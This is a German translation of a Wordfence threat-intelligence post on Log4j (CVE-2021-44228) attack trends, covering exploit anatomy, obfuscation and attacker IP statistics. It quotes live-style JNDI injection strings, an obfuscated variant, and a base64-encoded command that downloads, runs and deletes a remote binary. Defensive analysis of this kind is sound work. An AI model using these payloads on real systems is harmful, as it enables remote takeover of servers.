Analyse von Angriffsdaten und Trends mit Log4J als Ziel

2. August 2022
analyzing attack data and trends targeting Log4j

Die Sicherheitslücke in Log4j, die erstmals im November 2021 gemeldet wurde, hat Millionen von Geräten und Anwendungen auf der ganzen Welt betroffen. Sie hat das Potenzial, einem böswilligen Akteur die vollständige Kontrolle über anfällige Geräte zu ermöglichen. Aufgrund der Art und Weise, wie Log4j die Protokollierung von Zeichenketten und Code steuert, ermöglicht die Schwachstelle böswilligen Akteuren, bösartigen Code in die Protokolle einzuschleusen und Anwendungen dazu zu bringen, diesen bösartigen Code auszuführen. Wenn die Schwachstelle ausgenutzt wird, fügt Log4j den betroffenen Systemen und Netzwerken großen Schaden zu und ermöglicht einem Angreifer die vollständige Übernahme eines betroffenen Systems. Dies und die Leichtigkeit, mit der die Schwachstelle ausgenutzt werden kann, haben dazu geführt, dass die zugehörige Log4j CVE-2021-44228 Erhalt der ungewöhnlich hohen CVSS-Score von 10, was die maximale Bedrohungsbewertung ist, die vergeben werden kann.

Log4j ist ein Top-Logging-Dienstprogramm, das zu den Apache Logging Services gehört. Das Dienstprogramm ist Java-basiert und wurde erstmals 2001 veröffentlicht. Log4j erstellt ein Protokoll der Anwendungs- oder Systemaktivitäten und hilft Entwicklern dabei, Probleme zu erkennen, die sich negativ auf die Benutzerfreundlichkeit auswirken können. Auch wenn Log4j vor Dezember 2021 noch kein bekannter Name war, wurde es schnell zu einem viel diskutierten Thema, nachdem die Zero-Day-Schwachstelle mit der Bezeichnung CVE-2021-44228 im November an Apache gemeldet und am 6. Dezember 2021 gepatcht wurde. Fünf Tage vor der Veröffentlichung des Patches begannen böswillige Akteure, die Sicherheitslücke auszunutzen.

Wordfence ist auf über 4 Millionen Websites weltweit installiert, was uns einen beispiellosen Einblick in die Nutzdaten von Angreifern und in groß angelegte Angriffsmuster gibt. Wir nutzen diese Daten für die Wordfence IP-Blockliste, die unseren Wordfence Premium-, Wordfence Care- und Wordfence Response-Kunden zur Verfügung steht. Sie liefern uns auch wertvolle forensische Daten, die unser Incident Response-Team bei der forensischen Analyse für unsere Wordfence Care- und Wordfence Response-Kunden nutzen kann.

Wir bei Wordfence überwachen und blockieren Angriffe auf Log4j, weil die daraus gewonnenen Bedrohungsdaten uns helfen, Bedrohungsakteure zu identifizieren, die nicht nur unsere Kunden, sondern auch deren Hosting-Provider und Unternehmenssysteme auf der ganzen Welt ins Visier nehmen. Die Bedrohungsdaten, die wir durch die Überwachung dieser Angriffe erhalten, sind eine wertvolle Datenquelle für unsere Unternehmenskunden, wenn es darum geht, zu bestimmen, wen sie an ihrem Netzwerkrand blockieren sollten, welche C2-Kommunikation sie überwachen sollten und welche Server weltweit als Angriffsplattform genutzt werden und behoben werden müssen.

Anatomie eines Angriffs auf eine Log4j-Schwachstelle

Alles, was es braucht, um diesen Angriff auszuführen, ist die Eingabe eines Strings wie {jndi:ldap://malicious-site.com:1792/payload} in ein Formularfeld einzugeben, z. B. in das Feld für den Benutzernamen auf einer Anmeldeseite, oder sie in eine Anfrage an einen verwundbaren Server zu injizieren. Mit der richtigen Nutzlast kann dies eine Reverse Shell öffnen, die dem böswilligen Akteur die Möglichkeit gibt, Befehle auszuführen und Code auf dem angegriffenen Server zu starten.

Wenn der Server die Anfrage erhält, wird die böswillige Zeichenkette in das Protokoll geschrieben, und die Schwachstelle ermöglicht es, diesen Code auszuführen. In einem Beispiel für einen einfachen Exploit-Versuch, den wir entdeckt haben, verweist die Nutzlast auf den Ort cakgeqplp7krte800010wgfiJxzyhzpss.oast[.]fun/info. Diese Art von Nutzdaten wird oft zum Öffnen einer Reverse Shell verwendet, obwohl mit dieser Methode jede Menge bösartige Aktivitäten durchgeführt werden können.

einfache Log4j-Angriffsanfrage

In diesem Fall gibt der User-Agent an, dass die Anfrage von einem Google Chrome Browser auf Windows XP stammt. Das Spoofing von User-Agents ist eine Taktik, die sowohl von böswilligen Akteuren als auch von Sicherheitsforschern häufig verwendet wird, daher kann dies ein Anhaltspunkt sein, sollte aber mit Vorsicht genossen werden.

Benutzer-Agent-String

Wir sehen oft auch komplexere Versionen dieses Exploits. Die Nutzdaten werden oft an mehreren Stellen in der Anfrage mit base64-Kodierung versteckt. Dies ist eine gängige Methode böswilliger Akteure, um Sicherheitsmaßnahmen zu umgehen und ihren Code für Analysten oder Sicherheitsschutzmechanismen unlesbar zu machen. Die jndi:ldap: Teil der Nutzlast kann auch in Dummy-Funktionen versteckt werden. Bei diesen Angriffen werden mehrere Verschleierungstechniken eingesetzt, um die Entdeckung zu vermeiden und es Analysten zu erschweren, den Code zu lesen oder eine automatische Erkennung zu verhindern. Hier sehen wir, dass die ${jndi:ldap: Teil der Zeichenkette aufgespalten wird, um möglicherweise eine automatische Erkennung zu verhindern, weil die Zeichenkette im Code aufgespalten wird.

Log4j-Anfrage-Verschleierung

Die Abschnitte referrer, user-agent und x-api-version dieser Anfrage enthalten die vollständige Nutzlast, einschließlich ${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:} die zu jndi:ldap: in der Anfrage.

komplexe Log4j-Anfrage mit verschleierten Payloads

Böswillige Akteure wissen nicht, welche Felder auf einem System protokolliert werden, daher senden sie den Exploit häufig an mehreren Stellen, um zu sehen, was funktioniert. In der obigen Anfrage sehen wir den Referrer, den User-Agent und die X-API-Version mit der gleichen bösartigen Zeichenfolge. Die endgültige Nutzlast wird hier von //146.190.40.2:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjEwMS4xMzkuMjE2OjE5NjQvYTAwMS54ODYgLW8gYTAwMS54ODY7IHdnZXQgaHR0cDovLzE4NS4xMDEuMTM5LjIxNjoxOTY0L2EwMDEueDg2OyBjaG1vZCA3NzcgYTAwMS54ODY7IC4vYTAwMS54ODY7IHJtIC1yZiBhMDAxLng4Njsgcm0gLXJmIGEwMDEueDg2LjE= aufgerufen, die den beabsichtigten Befehl entschlüsselt und auf dem betroffenen Server ausführt.

Diese Methode verwendet sowohl curl als auch wget, um die Nutzdaten herunterzuladen, setzt die maximal zulässigen Berechtigungen für die Datei, führt die heruntergeladene Datei aus und entfernt dann beide Kopien der heruntergeladenen Datei, sobald sie ausgeführt wurde. Die Verwendung von mehreren Download-Methoden erhöht die Wahrscheinlichkeit eines erfolgreichen Downloads.

Endgültige Payloads scheinen schnell gelöscht zu werden. Wir haben versucht, eine endgültige Nutzlast von verschiedenen Orten aus zu erhalten, konnten aber keine erfolgreiche Verbindung zum Ort der Nutzlast herstellen. Das zeigt sowohl das Engagement der Cybersecurity-Community bei der Bekämpfung potenzieller Angriffe als auch, wie schnell bösartige Akteure weitermachen und bei Bedarf neue Ressourcen einrichten.

Volumen der Log4j-Exploit-Versuche im Zeitverlauf

Wordfence hat einige interessante Trends beobachtet, seit wir vor einigen Monaten begonnen haben, Exploit-Versuche für Log4j-Schwachstellen zu verfolgen und zu blockieren. Die Anzahl der Ausnutzungsversuche ist seit Beginn unserer Verfolgung relativ konstant, die Versuche kommen von unerwarteten Orten und einige Regionen scheinen größere Ziele zu sein. Dennoch zeigen unsere Daten, dass böswillige Akteure nicht von dieser Schwachstelle abrücken.

Gesamtvolumen der eingehenden Log4j-Angriffsversuche

Woher kommen die versuchten Angriffe?

Ein Blick auf die Daten der 100 wichtigsten Standorte, von denen in den letzten 30 Tagen Exploit-Versuche ausgingen, zeigt, dass nur wenige IP-Adressen für eine sehr große Anzahl von Exploit-Versuchen verantwortlich sind. In diesem Zeitraum gab es 11.060.156 blockierte Versuche und insgesamt 38.258 IP-Adressen, die als Verursacher von Exploit-Versuchen registriert wurden.

Anzahl der blockierten Exploits pro IP-Adresse

Zu den Serverstandorten der 15 meistgesuchten IP-Adressen gehören Länder wie die USA, die Schweiz, das Vereinigte Königreich, Frankreich und Belgien. Darüber hinaus können auch viele andere Länder legitime Gründe für den Zugriff auf deine Dienste haben, was regionale Sperrungen für viele Organisationen schwieriger macht.

Serveranbieter für die Top 15 der angreifenden IP-Adressen

Die Angriffsversuche gehen größtenteils von IP-Adressen aus, die legitimen Anbietern gehören. Das ist etwas, das wir häufig bei Angriffskampagnen beobachten, da die Angreifer in der Regel versuchen, den billigsten oder zuverlässigsten Weg zu finden, um ihre Angriffe durchzuführen. Es ist unwahrscheinlich, dass du den Zugriff von allen IP-Adressen blockieren willst, die Amazon oder Microsoft zugewiesen sind, und es wird auch nicht empfohlen, dies zu tun. Glücklicherweise werden die meisten dieser Anbieter den Zugang für Nutzer/innen, die bösartige Aktivitäten durchführen, schnell sperren.

Serverstandorte der 15 wichtigsten Angreifer-IP-Adressen

Böswillige Akteure nutzen oft eine IP-Adresse oder einen Dienst für kurze Zeit und wechseln dann schnell zu einer anderen IP-Adresse, einem anderen Server oder einem anderen Dienstanbieter. Dies kann entweder geschehen, um eine Entdeckung zu vermeiden, oder um sich zu erholen, sobald sie entdeckt wurden. Aus diesem Grund haben wir eine Blockliste, die regelmäßig mit bekannten bösartigen IP-Adressen aktualisiert wird. Wenn eine IP-Adresse nicht mehr für böswillige Zwecke verwendet wird, entfernen wir die Adresse von der Liste, damit legitime Websites und Dienste nicht blockiert werden. Auf diese Weise können böswillige Akteure blockiert werden, während legitime Website-Nutzer und Dienste den nötigen Zugang zu deiner Website erhalten.

Viele Unternehmen nehmen diese Sicherheitslücke ernst und lassen ihre Server auf die Schwachstelle überprüfen. Wir haben insgesamt 1.296.940 gutartige Scanversuche von Sicherheitsanbietern auf die Schwachstelle gesehen. Diese Scanversuche wurden von den obigen Daten ausgeschlossen.

Fazit

In diesem Beitrag haben wir uns mit der kritischen Log4j-Schwachstelle CVE-2021-44228 und der Sichtbarkeit von Wordfence als Anbieter von Endpunktsicherheit beschäftigt. Wordfence nutzt diese Daten, um sicherzustellen, dass unsere Nutzer vor aufkommenden und anhaltenden Bedrohungen, von Schwachstellen bis hin zu Malware, geschützt sind. Dieselben Daten können auch verwendet werden, um zusätzlichen Schutz vor Angriffen auf deine Netzwerke und andere Systeme zu bieten.

Bedrohungsdaten sind ein wichtiger Bestandteil, um deine Systeme, Anwendungen und Netzwerke sicher zu halten. Ein Blick auf die Trends und Details von Angriffskampagnen kann dir zeigen, welche Bedrohungen wahrscheinlich auf dein Unternehmen zukommen werden und gibt dir die Möglichkeit, Angriffe zu entschärfen.

Wenn du glaubst, dass deine Website durch diese oder eine andere Sicherheitslücke kompromittiert wurde, bieten wir Incident Response Services über Wordfence Care. Wenn du deine Seite sofort reinigen lassen willst, Wordfence Antwort bietet denselben Service mit 24/7/365 Verfügbarkeit und einer Reaktionszeit von 1 Stunde. Beide Produkte beinhalten praktischen Support, falls du weitere Hilfe benötigst.

Quelle


Dieser Artikel ist im Original von www.wordfence.com und wurde übersetzt
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-log4j/

Abonniere den RSS-Feed von unseren WP News und verpasse keine Meldung: https://die-mainagentur.de/feed/?post_type=wp-news

Alternativ kannst du unseren WP-Newsletter abonnieren

Mit dem Eintrag in den WP-Newsletter bekommst du per Mail über neue Artikel zugesendet. Du kannst den Newsletter jederzeit abbestellen.
Mehr dazu in der Datenschutzerklärung